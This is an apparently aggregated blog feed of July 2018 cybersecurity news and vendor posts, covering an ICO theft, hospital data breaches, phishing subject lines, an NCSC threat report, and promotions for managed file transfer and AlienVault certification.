In our report “Hiring and Retaining Top Cybersecurity Talent,” published this spring, (ISC)² found that the ability to “protect people and data” is one of the most important attributes cybersecurity jobseekers look for when evaluating a potential new employer. Effective bad bot protection fits into that mission – and may be something jobseekers take into account before accepting an offer.

The post A GROWING NUISANCE: HOW TO FEND OFF BAD BOTS appeared first on Cybersecurity Insiders.


July 28, 2018 at 05:27PM

Friday, July 27, 2018

ICO hacked: Hackers steal $8 million from KICKICO Blockchain network

By Waqas

Another day, another ICO hacked. This time, KICKICO, an Initial Coin Offering (ICO) project that lets users conduct ICOs, pre-ICOs, crowdfunding and crowdinvesting campaigns, has suffered a security breach and, as a result, hackers have stolen more than 70 million KickCoins, which is around $7.7 million. The cyber attack took place on Thursday, July 26th when hackers breached […]

This is a post from HackRead.com Read the original post: ICO hacked: Hackers steal $8 million from KICKICO Blockchain network


July 28, 2018 at 03:25AM

Spectre attack variant can be remotely mounted to extract sensitive data

By ghostadmin

What we know so far about Spectre attacks is that they rely upon execution of malicious code. The code is executed on computers having speculative-execution design flaws in the processor chip; once a device is compromised, it becomes possible to obtain sensitive data such as passwords, PINs, and keys. Such data is usually stored in the […]

This is a post from HackRead.com Read the original post: Spectre attack variant can be remotely mounted to extract sensitive data


July 27, 2018 at 09:29PM

Things I Hearted this Week, 27th July 2018

Welcome to your weekly security roundup, providing you all with the security news you deserve, but maybe might not need.

As always, these news stories are human-curated by me – no fancy algorithms, no machine learning, and definitely no trending topics here.

We are less than two weeks away from Blackhat in sunny Las Vegas. We’ll be there – pop along to booth 528 and say hello if you’re there.

Google: Security Keys Neutralized Employee Phishing

Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes.

While we’re on the topic of phishing, attackers used phishing emails to break into a Virginia bank twice in eight months, making off with more than $2.4 million in total. Now the bank is suing its cybersecurity insurance provider for refusing to fully cover the loss.

We’re probably going to see more of this kind of back and forth as companies that have taken out cyber insurance and suffered a breach fight with their insurers over liability and who will cover the cost.

Somewhat related:

Breaking the Chain

Supply chain and third party risks are getting better understood, but understanding a risk doesn’t necessarily mean it will reduce the risk.

Tesla, VW, and dozens of other car manufacturers had their sensitive information exposed due to a weak security link in their supply chains.

SIM Swap – A Victim’s Perspective

This is a really good write-up by AntiSocial engineer taking a look at how SIM swap fraud can impact victims, and why mobile phone operators need to do more to prevent this kind of fraud.

“It’s an all too common story, the signal bars disappear from your mobile phone, you ring the phone number – it rings, but it’s not your phone ringing. Chaos ensues. You’re now getting password reset emails from Facebook and Google. You try to login to your bank but your password fails.  Soon enough the emails stop coming as attackers reset your account passwords. You have just become the newest victim of SIM Swap Fraud and your phone number is now at the control of an unknown person.”

EU Fails to Regulate IoT Security

In this week’s head-scratching moment of “what were they thinking?”, the European Commission has rejected consumer groups’ calls for mandatory security for consumer internet-connected devices because they believe voluntary security from manufacturers is adequate. What a blow! 

And on cue,

When an Outdated Router Costs $1M

If you have an outdated router in a remote branch, what’s the worst that could happen? Well, apparently a lot more than you bargained for.

A notorious hacking group known as MoneyTaker has stolen roughly $1 million from a Russian bank after breaching its network via an outdated router.

The victim of the hack is PIR Bank, which lost at least $920,000 in money it had stored in a corresponding account at the Bank of Russia.

The Impact of GDPR

Under GDPR, data breach reports in the UK have quadrupled. The ICO has reported 1,750 breaches in June, up from 400 in April.

And speaking of breaches:

Randomness

Here are a few other news and articles I found interesting this week, some of which aren’t related directly to security.


The post Things I Hearted this Week, 27th July 2018 appeared first on Cybersecurity Insiders.


July 27, 2018 at 09:09PM

China, Russia, and Iran are top cyber threats to the United States

A report from the National Counterintelligence and Security Center released on Thursday states that China, Russia, and Iran are the top cyber adversaries to the US as these three nations have been caught red-handed conducting foreign economic and industrial espionage on American soil.

The NCSC report says that the three nations have been consistently stealing the trade secrets of the United States by digital means for years and are still ruining America’s prosperity by invading its security secrets from time to time – all to gain a competitive advantage.

Since Donald Trump is about to impose sanctions on Iran, the country is now topping the list for conducting several cyber operations on US firms and interests. For instance, a hacker group from Iran named “Rocket Kitten” has been accused of invading the defense secrets of the US in order to bolster Iran’s strength in missile and space programs, so that it can gain an edge over the United States in military technology and other areas.

China stands second on the list as it continues to use cyber espionage to support its strategic developments goals such as science and technology evolution, military modernization, and economic policy objectives.

Russia stands in the third position when it comes to the list of US adversaries as it has and is continuing to use cyber espionage skills as an instrument to collect information which benefits its economic interests.

Surprisingly, the list doesn’t include North Korea, which might be due to the fact that North Korean leader Kim Jong Un has portrayed a truce between the two nations, especially after his June ‘18 meeting in Singapore with Donald Trump, which went cordially as per the White House report.

In a media briefing held yesterday, William Evanina, the director of the National Counterintelligence and Security Center, told the media that his country will from now on not stay numb towards its adversaries who have been and are stealing the intellectual property and trade secrets of the nation.

As there is no sign that the cyber thefts will stop, Mr. Evanina said that his nation will start becoming aggressive towards such nations in the cyber landscape and will start isolating them from the globe in all forms.

The post China, Russia, and Iran are top cyber threats to the United States appeared first on Cybersecurity Insiders.


July 27, 2018 at 09:01PM

5 WAYS TO GET THE MOST OUT OF SECURITY CONGRESS

This post was originally published here by (ISC)² Management.

Security Congress is less than three months away! This year’s biggest and best cybersecurity conference will be held in New Orleans, Louisiana from October 8-10. Attending this year’s event can earn you as many as 46 CPEs for the year. To make sure you get the most out of #ISC2Congress, here are five things to do before you get to NOLA:

  1. Register for workshops

Reserved seating workshops are new to Security Congress this year. We will have five workshops available throughout the conference that require a registration. If you’ve already signed up for Security Congress, great! You can login to your registration and add them to your schedule. If not, hurry! Only 60 seats will be available in each workshop and most are close to full already. Security Congress workshop session numbers are 3010, 3011, 3012, 3013, 3014 and 3015 and can be found in the online agenda.

  2. Make cybersecurity personal

The Center for Cyber Safety and Education is hosting their annual orientation session to fill you in on the latest with the Garfield program, as well as other opportunities to engage with your community. The session kicks off Tuesday aka “Center Day” at Security Congress, which will be capped off with the Center Celebration on a riverboat cruise down the Mississippi River. The cruise is a separately ticketed event, but space is extremely limited on the Creole Queen. Make sure you save your spot soon for dinner, jazz and southern hospitality!

  3. Write your questions for Town Hall

Monday afternoon will include an (ISC)² Town Hall meeting open to both members and non-members. Management and Board of Directors members will be on the panel to talk about future developments, as well as answer your questions about membership, certification and more. You can submit your questions to congress@isc2.org or ask in person.

  4. Expand your network

Meet fellow Security Congress attendees online on the (ISC)² Community Security Congress board. You can chat with speakers, find out about upcoming webinars and earn a badge for registering for the conference. When you get to Security Congress, you’ll already know your fellow attendees and can celebrate a successful few days of learning and development at the closing event: “A Night in NOLA” Networking Night at Mardi Gras World.

  5. Leave room for swag in your bag

It’s not a conference without seemingly limitless swag! You can plan out your swag collection route with this Exhibit Hall map. Sponsors from the top cybersecurity training, product and software companies will be on hand to load you up with knowledge on their latest developments – plus probably a fidget spinner or two.


The post 5 WAYS TO GET THE MOST OUT OF SECURITY CONGRESS appeared first on Cybersecurity Insiders.


July 27, 2018 at 08:33PM

Gaining security visibility of your public cloud assets

This post was originally published here by eddy smith.

As the use of public cloud services increases, security teams struggle to maintain visibility of their cloud assets. In fact, in one recent survey, 43% of cloud security pros said that lack of visibility into infrastructure security is their biggest operational headache (cite: https://ift.tt/2NXdbQB).

So why is visibility so important? The relevant phrase here is cliché, but worth repeating: you can’t protect what you can’t see (or to quote the original Drucker-ism, “you can’t manage what you can’t measure”). If you don’t have visibility of your public cloud assets, you can’t protect them.

For example, if someone opens up permissions on an S3 bucket, exposing your sensitive data to the entire world—how would you know about that vulnerability if you didn’t know the S3 bucket existed in the first place?

Answering basic security visibility questions like “What cloud services and resources are we using” and “Are those services and resources secure?” can be extremely challenging in modern decentralized IaaS environments where multiple cloud service provider accounts are in use. Knowing the inventory and security state of your public cloud assets is difficult when there are hundreds of parameters to assess across multiple AWS accounts.

Answering tough questions like these requires comprehensive visibility of your public cloud—but how do you gain that visibility?


The post Gaining security visibility of your public cloud assets appeared first on Cybersecurity Insiders.


July 27, 2018 at 08:23PM

364 inmates hacked prison tablets to steal almost $225,000

By Waqas

Hundreds of inmates hacked the system and transferred almost $225,000 in their accounts. Inmates at Idaho Department of Correction are provided with computer tablets manufactured by a Florida based company JPay. These tablets are powered by communications and data services from CenturyLink, a telecommunications company, headquartered in Louisiana. The purpose of these tablets is to let inmates play games, buy music and […]

This is a post from HackRead.com Read the original post: 364 inmates hacked prison tablets to steal almost $225,000


July 27, 2018 at 06:36PM

How to Find Trustworthy Tools and Software for Your Business

By Carolina

Running a business requires a great deal of time, knowledge and expertise. If you want to take it to new heights, it’s imperative that you look for ways to save time by streamlining your processes. If not, you may find that a significant amount of time is being used carrying out mundane tasks and focusing […]

This is a post from HackRead.com Read the original post: How to Find Trustworthy Tools and Software for Your Business


July 27, 2018 at 03:21PM

Thursday, July 26, 2018

Cyber Attack on Boys Town Hospital and Blue Springs Family Care

A cyber attack on the database of Boys Town National Research Hospital in Omaha, Nebraska is said to have potentially compromised more than 105,309 patient medical records in May this year. After investigating the crisis, a spokesperson from Boys Town Healthcare chose to update the cyber incident to the press on Thursday this week.

As per the sources reporting to our Cybersecurity Insiders, it’s said that the hackers gained access to the database after sending a phishing email to one of the employees in the organization which eventually led to the hack.

All 105,309 individuals have been informed of the hack by email, which notified them that information such as dates of birth, social security numbers, diagnosis analysis, treatment details, Medicare and Medicaid identifiers, medical record numbers, billing and claims info, health insurance data, disability codes, birth and marriage certificates submitted after 2015, passport numbers, bank account numbers, website access credentials, driving license numbers, and employment identity codes were identified as exposed in the forensic investigation.

Why the healthcare organization chose to disclose the incident to the media this month happens to be a mystery.

In another incident of the same genre, Missouri based Blue Springs Family Care is said to have become a victim of a cyber attack where hackers have been reported to have accessed more than 44,997 patient medical records.

The hack started as a ransomware attack, and when the hospital authorities failed to pay the ransom, the hackers decided to dump the accessed data onto the dark web.

In this case, also, the attack took place on May 12, 2018, and the incident came to light now after an investigation was carried out by a third party vendor.

Some sources reporting to Cybersecurity Insiders say that the penetration of the database took place in Feb this year, when hackers succeeded in installing a variety of malware onto the server. The incident was only identified when the installed malware started to accept access commands from remote servers from early May this year.

The impacted data includes social security numbers, account numbers, driving license details, disability codes, medical diagnosis, addresses and dates of birth.

Note- If all the data could be combined, then hackers could easily carve out a profile of a victim which can lead to a medical fraud.

The post Cyber Attack on Boys Town Hospital and Blue Springs Family Care appeared first on Cybersecurity Insiders.


July 27, 2018 at 11:16AM

Here are the most common email phishing subject lines

In technical terms, email phishing is an attempt to obtain sensitive info such as usernames, passwords and credit card details by disguising an email and its links as coming from a trustworthy entity. This includes links to websites that distribute malware, that are nefarious or X-rated, or that conduct espionage on the victim’s device data.

A report compiled by KnowBe4 talks exactly about it and reveals the latest set of email subject lines that make you fall prey to phishing attacks. The list includes Add me join the network, Reset password, IT notice, Tax filing and New message, among others.

The report also lists the following sentence among the most popular email subject lines that are actually phishing emails: “A delivery attempt was made”.

The next email subject line topping the chart of phishing attacks this year is “You have won a lottery”, which asks you to disclose your financial details in order to claim the amount. The report said that more than 23% of cyber attack victims from the US have fallen prey to this subject line, as they entered some of their critical financial info which wasn’t meant to be made public at all.

Now, the biggest cyber threat of 2018 happens to be the following email subject line, where hackers send an email telling victims that they have been caught watching Po#% content by malware installed on their computer and that, if they do not want the video of them watching the X-rated content to be circulated on the web, they need to pay the hackers $3000 in Bitcoins.

For some, the subject line and the email content may vary and might claim to have compromised your computer webcam which recorded an embarrassing video of you.

The law enforcement in the United States has stated that all such emails are scams and has urged people not to click on the links provided in such emails.

Security experts advise marking those messages as spam and then deleting them. Also, messages which sound suspicious can be reported on the www dot usa.gov/stop-scams-frauds web page. This includes emails related to financial frauds, food stamp frauds, census frauds, identity theft scams, data breaches, immigration frauds, internet frauds, investment frauds and the like.

The post Here are the most common email phishing subject lines appeared first on Cybersecurity Insiders.


July 27, 2018 at 11:13AM


Identity theft protection firm LifeLock may have exposed user email addresses

By Waqas

LifeLock, an Arizona-based identity theft protection firm may have exposed email addresses of millions of its customers – Simply put: A firm vowing to protect online identity of its customers may have exposed their identity to malicious hackers and cybercriminals. It happened due to a critical vulnerability which exposed LifeLock’s customers to phishing and identity […]

This is a post from HackRead.com Read the original post: Identity theft protection firm LifeLock may have exposed user email addresses


July 27, 2018 at 03:57AM

FTP and Manual Processes Aren’t Enough to Keep Your File Transfers Safe

In its youth, FTP was revolutionary. Organizations used it during the early days of the internet to transfer files, like documents and images, over internal and external channels. And though it’s been over 40 years since its creation, many people still use FTP to send and receive file transfers.

But should they? The answer is no.

It’s time to move away from FTP

In the 1970s, the internet didn’t experience the sort of malicious activity and cyber attacks that organizations face today. FTP was created before security became a much-needed consideration for file transfers, and it hasn’t changed enough since its infancy to protect file transfers from being intercepted in transit.

Despite the risks FTP and other homegrown processes bring to the table, including security vulnerabilities (e.g. passwords that are stored unencrypted and easily captured by hackers) and non-compliance with several industry regulations, many organizations still use FTP as their preferred file transfer method. Some worry changing over to a secure file transfer method would be too disruptive to their business processes. Others consider the cost of the switch as non-compatible with their budget.

Still, moving away from FTP and unsecure manual file transfers is the best thing you can do for your business data. There are secure file transfer protocols you can use, like SFTP and FTPS, that will protect your files from prying outsiders, your business from noncompliance, and your customers from compromise. And you can find these protocols (and more) wrapped up in a comprehensive, affordable package: in Managed File Transfer (MFT) software.

From FTP to MFT: What’s the benefit?

MFT software gives organizations the ability to monitor, track, and report on all file transfer activity. Security and reporting tools help meet strict requirements for compliance regulations like PCI DSS, HIPAA, the GDPR, and state privacy laws, and user management features keep users from accessing data they aren’t authorized to see.

Furthermore, MFT offers IT teams the flexibility to connect with trading partners using today’s most popular secure file transfer protocols and encryption methods, including SFTP and FTPS as well as SCP, HTTPS, AS2, and OpenPGP.

Companies also use MFT software to reduce or even eliminate the time they spend on manual file transfers, user errors, and administrative costs. Managed File Transfer works to ensure that all files are delivered successfully and protected in transit as well as at rest.

If your files are highly sensitive, it’s time to make the switch from FTP and manual processes to a file transfer method that works.

What’s next? Finding the right MFT solution

To make your search for the right MFT solution easier, download this ultimate guide to evaluating MFT software. It will walk you through the five steps to finding the right solution for your organization, explain the many benefits of MFT, and give you information detailing any industry and security considerations you might have.

The guide also includes a requirements checklist, so you can evaluate different MFT solutions with confidence—and be sure you’ve found the one you need.

FTP and manual processes aren’t enough to keep your file transfers safe.

It’s time to modernize your file transfers and workflows with a solution that follows today’s cutting-edge cybersecurity practices and guidelines. Make the switch and see the benefits of efficiency and security in your organization right away.

The post FTP and Manual Processes Aren’t Enough to Keep Your File Transfers Safe appeared first on Cybersecurity Insiders.


July 27, 2018 at 02:21AM

New! AlienVault USM Anywhere Challenge Coin: What is it and how do I get one?

AlienVault has minted a challenge coin to acknowledge the commitment and dedication it takes to become an AlienVault® Certified Security Engineer. Becoming certified in any technology is something to be proud of but becoming certified on AlienVault® USM Anywhere proves that you are skilled in deploying and managing a threat detection solution that’s trusted by thousands of customers worldwide. The coin design proudly displays the AlienVault logo, along with a specific serialization that makes it a unique, one of a kind object.

So how do you earn an AlienVault challenge coin?

The coin is earned by passing the current version of the AlienVault® Certified Security Engineer (AVSE) exam.

It’s been three months since we introduced the certification for AlienVault® USM Anywhere™ so we thought it might be helpful to share how to prepare for the AlienVault® Certified Security Engineer (AVSE) and provide some background on what candidates can expect.

Since introducing the certification, we have seen a dramatically higher pass rate for those candidates who’ve attended both the AlienVault® USM Anywhere™: Deploy, Configure, Manage (ANYDC) and the AlienVault® USM Anywhere™: Security Analysis (ANYSA) courses. The certification validates the lessons learned in both courses so while it is not required, attending both courses will provide you the skills and knowledge you’ll need to successfully complete the AVSE certification. Attending the training also gives you hands-on experience with the product and the best possible path to earning the AVSE certification.  A certification exam voucher is included with each course.  

For candidates who have not taken the training but still need to prepare for the certification, we recommend reviewing the AVSE exam blueprint which can be found at the following link: https://www.alienvault.com/certification/avse.

AlienVault USM Anywhere documentation is also a great resource for review. It provides valuable insight into the product especially for candidates who have not taken the training courses. AlienVault USM Anywhere is a powerful product that continues to deliver new features and functionality. The documentation is the best way to stay current on the latest version of the product. You can find the documentation at the following link: https://www.alienvault.com/documentation/usm-anywhere.htm

We want to wish everyone the best of luck in their pursuit of AlienVault certification. If you are currently AVSE certified, please reach us at certification@alienvault.com and we’ll get your challenge coin out to you asap. If you have any questions about purchasing training you can reach us at https://www.alienvault.com/contact or call 888-613-6023.

Earn AlienVault’s challenge coin today and showcase your AlienVault USM Anywhere expertise!


The post New! AlienVault USM Anywhere Challenge Coin: What is it and how do I get one? appeared first on Cybersecurity Insiders.


July 26, 2018 at 09:09PM